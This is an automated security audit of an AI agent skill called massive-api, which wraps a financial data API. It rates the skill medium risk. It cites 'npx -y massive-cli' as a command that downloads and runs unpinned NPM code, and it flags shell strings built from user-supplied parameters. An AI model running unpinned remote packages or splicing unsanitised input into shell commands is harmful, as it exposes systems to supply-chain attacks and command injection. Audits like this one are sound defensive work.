Skills
skills/bruce-shi/massive-skill/massive-api/Gen Agent Trust Hub

massive-api

Warn

Audited by Gen Agent Trust Hub on Mar 8, 2026

Risk Level: MEDIUMREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill frequently uses npx -y massive-cli, which instructs the agent to download and execute code from the NPM registry at runtime.
  • Evidence: Found in SKILL.md and all command reference files (e.g., references/stocks_commands.md).
  • Risk: Executing un-versioned and un-scoped packages via npx exposes the system to potential supply chain attacks if the package name is squatted or the registry entry is compromised.
  • [COMMAND_EXECUTION]: The skill constructs shell commands using multiple user-controlled parameters such as tickers, dates, and window sizes.
  • Evidence: Command structures in references/crypto_commands.md and references/forex_commands.md interpolate various options into the npx execution string.
  • [EXTERNAL_DOWNLOADS]: The skill requires fetching data from the Massive (Polygon) API, which is an external network dependency.
  • Evidence: SKILL.md identifies the need for MASSIVE_API_KEY to access remote financial endpoints.
  • [SAFE]: The requirement for MASSIVE_API_KEY is documented and follows standard practices for API-integrated tools, provided the key is managed securely in the environment.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Mar 8, 2026, 10:06 PM